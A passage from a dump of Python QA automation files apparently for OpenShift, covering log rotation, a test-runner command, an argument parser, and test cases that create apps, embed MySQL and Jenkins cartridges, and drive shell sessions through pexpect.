fileobj.maxsize\n\tfileobj.close()\n\tshiftlogs(name, maxsave)\n\treturn LogFile(name, mode, maxsize)\n\n\n# assumes basename logfile is closed.\ndef shiftlogs(basename, maxsave):\n\ttopname = \"%s.%d\" % (basename, maxsave)\n\tif os.path.isfile(topname):\n\t\tos.unlink(topname)\n\n\tfor i in range(maxsave, 0, -1):\n\t\toldname = \"%s.%d\" % (basename, i)\n\t\tnewname = \"%s.%d\" % (basename, i+1)\n\t\ttry:\n\t\t\tos.rename(oldname, newname)\n\t\texcept OSError:\n\t\t\tpass\n\ttry:\n\t\tos.rename(basename, \"%s.1\" % (basename))\n\texcept OSError:\n\t\tpass\n\n\ndef open(name, maxsize=360000, maxsave=9):\n\treturn ManagedLog(name, maxsize, maxsave)\n\ndef writelog(logobj, data):\n\ttry:\n\t\tlogobj.write(data)\n\texcept SizeError:\n\t\treturn rotate(logobj)\n\telse:\n\t\treturn logobj\n\n\ndef _test(argv):\n\tbasename = \"/var/tmp/logfile_test\"\n\tlf = ManagedLog(basename, maxsize=1000)\n\tfor i in xrange(10000):\n\t\tlf.write(\"testing %i (%d) %s\\n\" % (i, lf.written(), string.ascii_letters))\n\tlf.note(\"test note\")\n\tlf.close()\n\nif __name__ == \"__main__\":\n\timport sys, string\n\t_test(sys.argv)\n\n\n\n" }, { "alpha_fraction": 0.542682945728302, "alphanum_fraction": 0.5455523729324341, "avg_line_length": 34.2911376953125, "blob_id": "5a76137490a95896881f947869b29468e6e80cba", "content_id": "f75837232c6e794a4faff363379bb7165495a976", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2788, "license_type": "no_license", "max_line_length": 76, "num_lines": 79, "path": "/automation/runlocal.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import os\nimport re\nimport sys\nfrom os.path import join, exists\n\nfrom robot import run\n\nimport hta2\nfrom hta2.core.exceptions import UsageError\nfrom hta2.core.management.base import BaseCommand\nfrom hta2.core.management.paramshandler import ParamsHandler\n\n\nTEMPLATES_PATH = join(hta2.__path__[0], 'template', 'project_template')\nTESTS_PATH = '/home/xin/pydev/HTA2/tests'\n\n\nclass Command(BaseCommand):\n\n def syntax(self):\n return \"[options]\"\n\n def short_desc(self):\n return \"Run project on local environment.\"\n\n def long_desc(self):\n return \"Run project on local 
environment.\\n \\\n                Some options must be provided\"\n\n    def add_options(self, parser):\n        parser.add_option('--notcms', action='store_true', dest='no_tcms',\n                          help='Whether to write results to TCMS in real time. \\\n                          Default is to write.')\n        parser.add_option(\"-c\", \"--cases\", dest=\"cases\",\n                          metavar=\"CASES_PATH\", help=\"Set CASES_PATH\")\n        parser.add_option(\"-p\", \"--planid\", dest=\"plan_id\",\n                          metavar=\"PLAN_ID\", help=\"Set PLAN_ID\")\n        parser.add_option(\"-r\", \"--runid\", dest=\"run_id\", default='',\n                          metavar=\"RUN_ID\", help=\"Set RUN_ID\")\n        parser.add_option(\"-o\", \"--output\", dest=\"output_dir\", default='./',\n                          metavar=\"OUTPUT_DIR\", help=\"Set OUTPUT_DIR\")\n        parser.add_option(\"-t\", \"--tags\", dest=\"case_tags\", action=\"append\",\n                          default=[], metavar=\"CASE_TAGS\",\n                          help=\"Select case via CASE_TAG\")\n\n    def run(self, args, opts):\n        if not opts.cases:\n            raise UsageError(\"case path must be set using -c/--cases!\")\n        plan_id = opts.plan_id\n        run_id = opts.run_id\n        log_level = 'DEBUG'\n        noncritical = ['noncritical']\n        exclude_tag = ['notready']\n        cases_path = opts.cases\n        listener = 'hta2.core.management.listener.TCMSListener:%s:%s' \\\n                   % (plan_id, run_id)\n        case_tags = opts.case_tags\n        output_dir = opts.output_dir\n        if not opts.no_tcms:\n            if not opts.plan_id:\n                raise UsageError(\"plan id must be set using -p/--planid!\")\n            run(cases_path,\n                loglevel=log_level,\n                include=case_tags,\n                exclude=exclude_tag,\n                noncritical=noncritical,\n                outputdir=output_dir,\n                listener=listener)\n        else:\n            run(cases_path,\n                loglevel=log_level,\n                include=case_tags,\n                exclude=exclude_tag,\n                noncritical=noncritical,\n                outputdir=output_dir)\n\n\nif __name__ == '__main__':\n    print 'test'\n" }, { "alpha_fraction": 0.7053701281547546, "alphanum_fraction": 0.7053701281547546, "avg_line_length": 22.758621215820312, "blob_id": "7492c75398e0e4babdf222d37a3b940bbf5f6c43", "content_id": "54be4984a1a30c16ee41ceb2b80556612e1360b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 689, "license_type": "no_license", "max_line_length": 63, "num_lines": 29, "path": "/automation/open/testmodules/RT/quick_start/quick_start_drupal_zend.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport rhtest\nimport common\n# user defined packages\nfrom quick_start_drupal import QuickStartDrupal\n\nclass QuickStartDrupalZend(QuickStartDrupal):\n\n    def __init__(self, config):\n        QuickStartDrupal.__init__(self, config)\n        self.config.application_type = common.app_types[\"zend\"]\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(QuickStartDrupalZend)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.5888210535049438, "alphanum_fraction": 0.6061676740646362, "avg_line_length": 33.19780349731445, "blob_id": "573a28897a78ffbbd826fea7e006252ff115b018", "content_id": "d88302932e5013a042b2b20ea42056a1bc1d2519", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3115, "license_type": "no_license", "max_line_length": 121, "num_lines": 91, "path": "/automation/open/testmodules/UI/web/case_138623.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# 
coding=utf-8\n#\n# File name: case_138623.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckAppPage(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n web.create_app(\"python-2.6\",\"python\")\n\n #check wether the links are correct\n time.sleep(20)\n #go to the app details page\n web.go_to_app_detail(\"python\")\n\n #check the \" add an SSH public key to your account\" link\n web.click_element_by_xpath('''//section[@id='app-cartridges']/div/div/div/div/p/a''')\n web.assert_text_equal_by_xpath('''My Account''','''//div[@id='content']/div/div/div/div[2]/div/h1''')\n web.go_back()\n #check the \"Enable Jenkins builds\" link\n web.click_element_by_xpath('''//section[@id='app-cartridges']/div/div/div/div/div[2]/div/a''')\n web.assert_text_equal_by_xpath('''Enable Jenkins Builds''','''//div[@id='content']/div/div/div/div[2]/div/h1''')\n web.go_back()\n #check the \"See the getting started tips for this app →\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul/li/a''')\n web.assert_text_equal_by_xpath('''GET STARTED''','''//div[@id='content']/div/div/div/div/div/nav/ul/li[3]''')\n web.go_back()\n\n #check the \"OpenShift User Guide\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul[2]/li/a''')\n time.sleep(3)\n web.check_title(\"User Guide - Red Hat Customer Portal\")\n web.go_back()\n #check the \"Sync your OpenShift repo with an existing Git repo\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul[2]/li[2]/a''')\n web.assert_text_equal_by_xpath('''Knowledge Base''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''')\n web.go_back()\n #check the \"Delete this application\" link\n web.click_element_by_xpath('''//aside[@id='app-unique-info']/div[2]/a''')\n web.assert_text_equal_by_xpath('''Delete Application''','''//div[@id='content']/div/div/div/div[2]/div/h1''')\n web.go_back()\n #check the \"Add Cartridge\" link\n web.click_element_by_xpath('''//section[@id='app-cartridges']/div[2]/a/strong''')\n web.assert_text_equal_by_xpath('''ADD A CARTRIDGE''','''//div[@id='content']/div/div/div/div/div/nav/ul/li[3]''')\n \n #delete a python app\n web.delete_last_app(\"python\")\n\n\n self.tearDown()\n\n return self.passed(\" case_138623--CheckAppGetstartedPage passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckAppPage)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_138623.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5390801429748535, "alphanum_fraction": 0.5466197729110718, "avg_line_length": 26.44137954711914, "blob_id": "a55c5de0218aa6fa8426ebe59a5e0e05c0f6ff9d", "content_id": "9c85a47cc7e8de826e0cdc896f691aff4a694300", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3979, "license_type": "no_license", "max_line_length": 85, "num_lines": 145, "path": "/automation/open/lib/supports/nmsgetopt.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab\n# License: LGPL\n# Keith Dart <[email 
protected]>\n\n\"\"\"\nSpecial getopt function. It returns long options as a dictionary. Any\nname-value pair may be given on the command line.\n\n\"\"\"\nimport nmsbuiltins\n\nclass GetoptError(Exception):\n opt = ''\n msg = ''\n def __init__(self, msg, opt):\n self.msg = msg\n self.opt = opt\n Exception.__init__(self, msg, opt)\n\n def __str__(self):\n return self.msg\n\nadd_exception(GetoptError)\n\n#def nmsgetopt(argv):\n# \"\"\"nmsgetopt(argv)\n#Parses the argument list and returns an nms configuration object initialized\n#with command-line arguments. \"\"\"\n# import config\n# try:\n# optlist, extraopts, args = getopt(argv[1:], \"hdvc:f:\")\n# except GetoptError, err:\n# print >>sys.stderr, err\n# sys.exit(2)\n# cf = config.get_config(initdict=extraopts)\n# for opt, optarg in optlist:\n# if opt == \"-h\":\n# print __doc__\n# sys.exit(2)\n# if opt == \"-d\":\n# cf.flags.DEBUG += 1\n# if opt == \"-v\":\n# cf.flags.VERBOSE += 1\n# if opt == \"-c\" or opt == \"-f\":\n# cf.mergefile(optarg)\n# cf.argv = args\n# return cf\n\n\n# special getopt processing for tests. long-form options get placed in\n# a dictionary of name-value pairs.\n\ndef getopt(args, shortopts):\n \"\"\"getopt(args, options) -> opts, long_opts, args \nReturns options as list of tuples, long options as entries in a dictionary, and\nthe remaining arguments.\"\"\"\n opts = []\n longopts = {}\n while args and args[0].startswith('-') and args[0] != '-':\n if args[0] == '--':\n args = args[1:]\n break\n if args[0].startswith('--'):\n arg = args.pop(0)\n _do_longs(longopts, arg)\n else:\n opts, args = _do_shorts(opts, args[0][1:], shortopts, args[1:])\n\n return opts, longopts, args\n\ndef _do_longs(longopts, opt):\n try:\n i = opt.index('=')\n except ValueError:\n raise GetoptError('long options require arguments in the form opt=arg.', opt)\n opt, optarg = opt[2:i], opt[i+1:]\n longopts[opt] = optarg\n return longopts\n\ndef _do_shorts(opts, optstring, shortopts, args):\n while optstring != '':\n opt, optstring = optstring[0], optstring[1:]\n if _short_has_arg(opt, shortopts):\n if optstring == '':\n if not args:\n raise GetoptError('option -%s requires argument' % opt,\n opt)\n optstring, args = args[0], args[1:]\n optarg, optstring = optstring, ''\n else:\n optarg = ''\n opts.append(('-' + opt, optarg))\n return opts, args\n\ndef _short_has_arg(opt, shortopts):\n for i in range(len(shortopts)):\n if opt == shortopts[i] != ':':\n return shortopts.startswith(':', i+1)\n raise GetoptError('option -%s not recognized' % opt, opt)\n\n\n# XXX\nclass Arguments(object):\n def __init__(self, optlist=\"\"):\n self._optlist = optlist\n self._opts = None\n self._longopts = None\n self._args = None\n \n def parse(args):\n optlist, self._longopts, self._args = getopt(args, self._optlist)\n for opt, optarg in optlist:\n self._opts[opt] = optarg\n\n def __getitem__(self, idx):\n try:\n i = int(idx)\n except (ValueError, TypeError):\n return self._opts[idx]\n else:\n return self._args[i]\n\n def __iter__(self):\n return iter(self._args)\n\n\n# self test\ndef _test():\n import sys\n dopt = 0\n try:\n optlist, extraopts, args = getopt([ \"-d\", \"--opt1=1\", \"arg1\", \"arg2\"], \"d\")\n except GetoptError, err:\n print >>sys.stderr, \"ERR:\", err\n for opt, optarg in optlist:\n if opt == \"-d\":\n dopt = 1\n print extraopts\n print dopt\n print args\n\nif __name__ == \"__main__\":\n _test()\n" }, { "alpha_fraction": 0.7612359523773193, "alphanum_fraction": 0.7696629166603088, "avg_line_length": 26.230770111083984, "blob_id": 
"f1436d78a1b61cf1a52df3eb611a249f6e8497e4", "content_id": "c539718ccc020415e0b8fb9168a05aab3e5a0db0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 356, "license_type": "no_license", "max_line_length": 73, "num_lines": 13, "path": "/automation/Example/pages/testem.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from hta2.lib.selenium.webdriver import Firefox\nfrom hta2.tests.bugzilla.webui.pages.homepage import HomePage\n#from hta2.tests.bugzilla.webui.ui_mapping import homepage as homepage_ui\n\nff = Firefox()\nhomepage = HomePage(ff)\nhomepage.login()\nhomepage.open_admin_page()\n\n\n\n#class HomePageTest(UITestCase):\n# \"\"\"Base class for User portal test cases.\"\"\"\n\n\n" }, { "alpha_fraction": 0.5190063714981079, "alphanum_fraction": 0.5315518975257874, "avg_line_length": 34.42222213745117, "blob_id": "04ea88bc7e23491457718d7273850b907d254cef", "content_id": "ea4017b7370b1630bc0710590477fbed5d47c650", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7971, "license_type": "no_license", "max_line_length": 100, "num_lines": 225, "path": "/automation/open/testmodules/RT/node/login_via_rhcsh.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nLinqing Lu\[email protected]\nDec 30, 2011\n\n[US548][Runtime][rhc-node] Log into user application via rhcsh for debugging\nhttps://tcms.engineering.redhat.com/case/126301/?from_plan=4962\n\"\"\"\nimport sys\nimport os\n\nimport rhtest\nimport common\nimport OSConf\nimport pexpect\nimport time\n\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.app_name = 'php'\n self.app_type = common.app_types[self.app_name]\n self.summary =\"[US548][Runtime][rhc-node] Log into user application via rhcsh for debugging\"\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass LoginViaRHCSH(OpenShiftTest):\n def test_method(self):\n self.add_step(\n \"Create an %s app: %s\" % (self.app_type, self.app_name),\n common.create_app,\n function_parameters = [self.app_name, self.app_type, \n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd, \n False],\n expect_description = \"App should be created successfully\",\n expect_return = 0)\n\n self.add_step(\"get ssh url\",\n OSConf.get_ssh_url,\n function_parameters = [self.app_name])\n\n self.add_step(\"run rhcsh test with pexpect\",\n self.rhcsh_test_1,\n expect_return = 0)\n\n self.add_step(\"embed mysql into app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"add-mysql-5.1\"],\n expect_return = 0)\n\n if self.get_run_mode() != 'OnPremise':\n self.add_step(\"embed phpmyadmin into app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"add-phpmyadmin-3.4\"],\n expect_return = 0)\n\n self.add_step(\"remove mysql from app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"remove-mysql-5.1\"],\n expect_return = 0)\n \n self.add_step(\"remove phpmyadmin from app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"remove-phpmyadmin-3.4\"],\n expect_return = 0)\n \n self.add_step(\"embed mongodb into app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"add-mongodb-2.2\"],\n expect_return = 0)\n \n self.add_step(\"embed rockmongo into app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, 
\"add-rockmongo-1.1\"],\n expect_return = 0)\n \n self.add_step(\"embed metrics into app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"add-metrics-0.1\"],\n expect_return = 0)\n\n self.add_step(\"run rhcsh test with pexpect\",\n self.rhcsh_test_2,\n expect_return = 0)\n\n self.add_step(\"get ssh url\",\n OSConf.get_ssh_url,\n function_parameters = [self.app_name])\n\n self.add_step(\"run ssh with valid command\",\n \"ssh __OUTPUT__[2] ls\",\n expect_str = ['git', self.app_name],\n expect_return = 0)\n\n self.add_step(\"run ssh with valid command\",\n \"ssh -t __OUTPUT__[2] rhcsh ls -al &> ls.log\")\n\n self.add_step(\"check redirected output\",\n \"cat ls.log\",\n expect_str = ['git', self.app_name, '.gitconfig'],\n #unexpect_str = ['WARNING: This ssh terminal was started without a tty.'],\n expect_return = 0)\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n def rhcsh_test_1(self):\n app_url = OSConf.get_app_url(self.app_name)\n ssh_url = OSConf.get_ssh_url(self.app_name)\n p = pexpect.spawn('ssh %s'% ssh_url, timeout=400)\n p.logfile = sys.stdout\n #index = p.expect([OSConf.get_app_url(self.app_name), pexpect.EOF, pexpect.TIMEOUT])\n\n p.expect('Welcome to OpenShift shell')\n p.expect(app_url)\n p.sendline('ls -l ~/app-root/data/.bash_profile')\n p.expect('-rwx.*.bash_profile')\n #p.sendline('ls -l ~/app-root/data/.bash_history')\n #p.expect('-rwx.*.bash_history')\n p.sendline('ls')\n p.expect('git')\n p.sendline('cd %s/data/ && touch test && echo \"test_text\" > test ; echo $?'% self.app_type)\n p.expect('0')\n p.sendline('cat test')\n p.expect('test_text')\n p.sendline('rm -f test ; ls test || echo \"ok\"')\n p.expect('ok')\n p.sendline('ps -efww')\n p.expect('/usr/bin/rhcsh -i')\n p.sendline('export test=\"rhcsh-test\"; echo $test')\n p.expect('rhcsh-test')\n p.sendline('help')\n p.expect('Help menu:')\n #p.sendline('tail_all') ### XXX do we need tail_all test?\n #p.expect('==> /var/lib/(.*)-000000-(.*) <==')\n #p.expect('==> /var/lib/(.*)-000000-(.*) <==')\n # p.sendcontrol('c')\n #p.sendcontrol('d')\n #p.sendline('exit')\n p.expect('timed out waiting for input: auto-logout', timeout=360)\n p.expect('Connection to %s closed.'% app_url)\n return 0\n\n def rhcsh_test_2(self):\n app_url = OSConf.get_app_url(self.app_name)\n ssh_url = OSConf.get_ssh_url(self.app_name)\n app_uuid = OSConf.get_app_uuid(self.app_name)\n p = pexpect.spawn('ssh -t %s rhcsh'% ssh_url)\n p.logfile = sys.stdout\n\n p.expect('Welcome to OpenShift shell')\n p.expect(app_url)\n p.sendline('ps -efww | grep \"/usr/sbin/httpd\" | grep -v \"grep\" | wc -l')\n #p.sendline('pgrep -u %s httpd | wc -l' %(app_uuid))\n if self.get_run_mode() == 'OnPremise':\n p.expect(\"2\")\n else:\n p.expect(\"6\")\n p.sendline('ctl_app stop')\n time.sleep(2)\n p.expect(app_url)\n #p.expect(\"Waiting for stop to finish\")\n p.sendline('ps -efww | grep \"/usr/sbin/httpd\" | grep -v \"grep\" | wc -l')\n #p.sendline('pgrep -u %s httpd | wc -l' %(app_uuid))\n if self.get_run_mode() == 'OnPremise':\n p.expect(\"0\")\n else:\n p.expect([\"4\"])\n p.sendline('ctl_app start')\n time.sleep(2)\n p.expect(app_url)\n p.sendline('ps -efww | grep \"/usr/sbin/httpd\" | grep -v \"grep\" | wc -l')\n #p.sendline('pgrep -u %s httpd | wc -l' %(app_uuid))\n if self.get_run_mode() == 'OnPremise':\n p.expect(\"2\")\n else:\n p.expect([\"6\"])\n #p.sendline('ctl_app restart')\n\t#p.expect('?')\n\t#p.sendline('1')\n #time.sleep(2)\n #p.expect(app_url)\n #p.sendline('ps -efww | grep 
\"/usr/sbin/httpd\" | grep -v \"grep\" | wc -l')\n #p.sendline('pgrep -u %s httpd | wc -l' %(app_uuid))\n #if self.get_run_mode() == 'OnPremise':\n # p.expect(\"2\")\n #else:\n # p.expect([\"6\"])\n p.sendline('ctl_all stop')\n p.expect(app_url)\n time.sleep(2)\n p.sendline('ps -efww | grep -v \"grep\" | wc -l')\n #p.sendline('pgrep -u %s | wc -l' %(app_uuid))\n p.expect([\"5\"])\n p.sendline('ctl_all start')\n p.expect(app_url)\n time.sleep(2)\n p.sendline('ps -efww | grep -v \"grep\" | wc -l')\n #p.sendline('pgrep -u %s | wc -l' %(app_uuid))\n if self.get_run_mode() == 'OnPremise':\n p.expect([\"10\", \"11\"])\n else:\n p.expect([\"17\", \"18\"])\n p.sendline('exit')\n p.expect('Connection to %s closed.'% app_url)\n return 0\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(LoginViaRHCSH)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5915870070457458, "alphanum_fraction": 0.5961759090423584, "avg_line_length": 32.08860778808594, "blob_id": "1b94f604f2b3eb3bad9e25ac8dc0c71de7b2906b", "content_id": "73c30f0935fd2fe597b9fea3f9557d49fa96b19e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2615, "license_type": "no_license", "max_line_length": 105, "num_lines": 79, "path": "/automation/open/testmodules/RT/cartridge/embed_mysql.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nMichal Zimen\[email protected]\nApr 04, 2012\n[rhc-cartridge] embed MySQL instance to RAW application\nhttps://tcms.engineering.redhat.com/case/???/\n\"\"\"\nimport os\nimport sys\n\nimport rhtest\nimport testcase\nimport common\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary =\"[rhc-cartridge] embed MySQL instance to an application\"\n try:\n self.app_type = common.app_types[self.config.test_variant]\n except:\n self.app_type = common.app_types[\"php\"]\n self.app_name = \"app4mysql\"\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass EmbedMysql(OpenShiftTest):\n def test_method(self):\n mysql = common.cartridge_types['mysql']\n steps_list = []\n steps_list.append( testcase.TestCaseStep(\"Create a %s app\" % (self.app_type), common.create_app, \n function_parameters=[self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n steps_list.append(testcase.TestCaseStep(\"Embed mysql to the app\", \n common.embed,\n function_parameters=[self.app_name, \"add-\" + common.cartridge_types['mysql']],\n expect_description=\"the mysql cartridge should be embedded successfully\",\n expect_return=0))\n\n steps_list.append(testcase.TestCaseStep(\"Remove embedded mysql from the app\", \n common.embed,\n function_parameters=[self.app_name, \"remove-\" + common.cartridge_types['mysql']],\n expect_description=\"the mysql should be removed successfully\",\n expect_return=0))\n\n\n case = testcase.TestCase(self.summary, steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % 
self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EmbedMysql)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5213077664375305, "alphanum_fraction": 0.5347237586975098, "avg_line_length": 49.10734558105469, "blob_id": "52533065135924a3175d27db077da198fe5ada2a", "content_id": "92f5651409abfd234cc42474c2a7b09f91041d82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8870, "license_type": "no_license", "max_line_length": 139, "num_lines": 177, "path": "/automation/open/testmodules/RT/cartridge/jenkins_negative_testing.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US1178 & US1034] [rhc-cartridge] Negative testing for jenkins cartridge \nhttps://tcms.engineering.redhat.com/case/122372/\n\"\"\"\nimport os,sys,re\nimport time\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n try:\n self.test_variant = self.config.test_variant\n except:\n self.info(\"Missing OPENSHIFT_test_name, used `php` as default\")\n self.test_variant= \"php\"\n\n self.app_name = self.test_variant.split('-')[0] + \"negative\"\n self.git_repo = \"./%s\" % (self.app_name)\n self.app_type = common.app_types[self.test_variant]\n self.output = dict()\n tcms_testcase_id=122372\n \n common.env_setup()\n\n def finalize(self):\n #OSConf.initial_conf()\n pass\n\nclass JenkinsNegativeTesting(OpenShiftTest):\n def test_method(self):\n case=testcase.TestCase(\"[US1178 & US1034] [rhc-cartridge] Negative testing for jenkins cartridge \", [])\n try:\n # 1.Create an app\n (retcode, self.output[1]) =testcase.TestCaseStep(\"1. Create an %s app\" % (self.test_variant),\n common.create_app,\n function_parameters=[self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description = \"the app should be created successfully\",\n expect_return=0).run()\n\n # 2.Try to embed jenkins client to the app without jekins server app created\n (retcode, self.output[2]) = testcase.TestCaseStep(\"2.Try to embed jenkins client to the app without jekins server app created\",\n common.embed,\n function_parameters=[self.app_name, \"add-jenkins-client-1.4\", \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"the jenkins client should not be embedded\",\n expect_return=\"!0\",\n expect_string_list=[\"Jenkins server does not exist\",],).run()\n\n # 3.Access app's url to make sure it's still available\n app_url = \"https://\" + OSConf.get_app_url(self.app_name)\n (retcode, self.output[3]) =testcase.TestCaseStep(\"3.Access app's url to make sure it's still available\",\n common.grep_web_page,\n function_parameters=[app_url, \"Welcome to OpenShift\", \"-k -H 'Pragma: no-cache'\", 3, 9],\n expect_description=\"The app should be available\",\n expect_return=0).run()\n\n # 4.Create a jenkins server app\n (retcode, self.output[4]) = testcase.TestCaseStep(\"4. 
Create an jenkins app\",\n common.create_app,\n function_parameters=[\"server\", \n \"jenkins-1.4\", \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n False],\n expect_description=\"the jenkins app should be created successfully\",\n expect_return=0).run()\n time.sleep(10)\n\n # 5.Embed jenkins client to the app\n (retcode, self.output[5]) = testcase.TestCaseStep(\"5.Embed jenkins client to the app\",\n common.embed,\n function_parameters=[self.app_name, \n \"add-jenkins-client-1.4\", \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"the jenkins client should be embedded successfully\",\n expect_return=0,\n try_count=3,\n try_interval=5).run()\n\n # 6.Make some change in the git repo and git push\n test_html = \"my test page\"\n type_to_cmd = { \n \"php-5.3\" : \"echo '%s' > %s/php/index.php\" % (test_html, self.git_repo),\n \"jbossas-7\" : \"echo '%s' > %s/src/main/webapp/index.html\" % (test_html, self.git_repo),\n \"python-2.6\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/wsgi/application\" % (test_html, self.git_repo),\n \"ruby-1.8\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/config.ru\" % (test_html, self.git_repo),\n \"perl-5.10\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/perl/index.pl\" % (test_html, self.git_repo)\n }\n cmd = type_to_cmd[self.app_type]\n (retcode, self.output[6]) = testcase.TestCaseStep(\"6.Make some changes in the git repo and git push\",\n cmd,\n expect_description=\"the git repo is modified successfully and git push succeeds\",\n expect_return=0).run()\n # Trigger jenkins build\n (retcode, self.output[6]) = testcase.TestCaseStep(\"6.Trigger jenkins build\",\n common.trigger_jenkins_build,\n function_parameters=[self.git_repo],\n expect_description=\"the git repo is modified successfully and git push succeeds\",\n expect_return=True).run()\n\n # 7.Check if the changes take effect\n (retcode, self.output[7]) = testcase.TestCaseStep(\"7.Check if the changes take effect\",\n common.grep_web_page,\n function_parameters=[app_url, test_html, \"-k -H 'Pragma: no-cache'\", 3, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0).run()\n\n # 8.remove the jenkins server app\n (retcode, self.output[8]) = testcase.TestCaseStep(\"8. 
Destroy the jenkins server app\",\n common.destroy_app,\n function_parameters=[\"server\", self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the jenkins app should be destroyed successfully\",\n expect_return=0).run()\n\n # 9.Do some change to normal app's git repo and git push\n old_html = test_html\n test_html = \"This is a test page\"\n type_to_cmd = { \n \"php-5.3\" : \"echo '%s' > %s/php/index.php\" % (test_html, self.git_repo),\n \"jbossas-7\" : \"echo '%s' > %s/src/main/webapp/index.html\" % (test_html, self.git_repo),\n \"python-2.6\" : \"sed -i -e 's/%s/%s/g' %s/wsgi/application\" % (old_html, test_html, self.git_repo),\n \"ruby-1.8\" : \"sed -i -e 's/%s/%s/g' %s/config.ru\" % (old_html, test_html, self.git_repo),\n \"perl-5.10\" : \"sed -i -e 's/%s/%s/g' %s/perl/index.pl\" % (old_html, test_html, self.git_repo) }\n cmd = type_to_cmd[self.app_type]\n (retcode, self.output[9]) = testcase.TestCaseStep(\"9.Make some changes in the git repo and git 